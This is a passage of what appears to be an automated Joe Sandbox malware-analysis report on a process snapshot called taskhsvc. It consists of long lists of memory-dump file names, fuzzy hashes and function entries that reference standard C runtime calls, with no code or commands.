Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_failexitfree
String ID:
API String ID: 780109331-0
Opcode ID: db06f622bf2b332398036faec179c83c18d6eadf33d4781619ba88483cbf3bd9
Instruction ID: 4d7041fc3c2a58397f233fb236916bd312910dfd34c47b4e7200022c136f97a9
Opcode Fuzzy Hash: db06f622bf2b332398036faec179c83c18d6eadf33d4781619ba88483cbf3bd9
Instruction Fuzzy Hash: 7431A7B0A18306DFDB00EFA9C5497AEBBF0BB44314F148819E494AB381D7789945DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00E558E6 Relevance: 4.6, APIs: 3, Instructions: 81COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00E55942
__stack_chk_fail.LIBSSP-0 ref: 00E55A16

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

abort.MSVCRT ref: 00E559E9

Memory Dump Source

Source File: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abortstrrchr
String ID:
API String ID: 2422377151-0
Opcode ID: 9c5fc86ede13c5853ea62faa6ff92920e281c3898898cc5578096f40231af1a5
Instruction ID: 696c4dd2e56021fc7d0861da5b3aa29456d79aa79413bfc825445f6daf2a6fd5
Opcode Fuzzy Hash: 9c5fc86ede13c5853ea62faa6ff92920e281c3898898cc5578096f40231af1a5
Instruction Fuzzy Hash: FF31E1B4E0570ADFCB04EFA9C585AAEBBF0BF48344F109819E894AB341D3389948CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00EF55C5 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00EF56C2

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00EE2E2F), ref: 00EF5635
_write.MSVCRT ref: 00EF5691

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$strrchr$_writeabort
String ID:
API String ID: 1790930388-0
Opcode ID: 168e699776a67644f70226ecc3c79d5c2bf7c5b801421d482d166c4b988bcbdf
Instruction ID: 747169570abcde0933042a8cddbab9e2f767d1461a3c00b81f64e0aee001ae85
Opcode Fuzzy Hash: 168e699776a67644f70226ecc3c79d5c2bf7c5b801421d482d166c4b988bcbdf
Instruction Fuzzy Hash: FE31B1B4E0460A9FCB04DFA8C684AAEBBF0BF48314F518929E564F7354D734A941CF66

Uniqueness

Uniqueness Score: -1.00%

Function 00DB34DB Relevance: 4.6, APIs: 3, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 00EF107E: abort.MSVCRT ref: 00EF10D1
Part of subcall function 00EF107E: malloc.MSVCRT ref: 00EF10E9
Part of subcall function 00EF107E: exit.MSVCRT ref: 00EF112A
Part of subcall function 00EF107E: __stack_chk_fail.LIBSSP-0 ref: 00EF113D

abort.MSVCRT(?,?,?,00DA2E25), ref: 00DB35A1
memset.MSVCRT ref: 00DB35BC
__stack_chk_fail.LIBSSP-0(?,?,?,00DA2E25), ref: 00DB35CF

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abortstrrchr$exitmallocmemset
String ID:
API String ID: 1956349505-0
Opcode ID: d202dd3ab5801179110b30e240533558d8fdee236813337dad2eb815d6470c59
Instruction ID: e10cb786703653970336469c0ef29ce8b466c537e406defa6556d23520e32e54
Opcode Fuzzy Hash: d202dd3ab5801179110b30e240533558d8fdee236813337dad2eb815d6470c59
Instruction Fuzzy Hash: C2319FB4E0020A8FCB00DF99C586AAEFBF0BF48314F058459E554AB325D778E945DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DB8C15 Relevance: 4.6, APIs: 3, Instructions: 59COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00DB8C79
free.MSVCRT ref: 00DB8CBD
__stack_chk_fail.LIBSSP-0 ref: 00DB8CD7

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
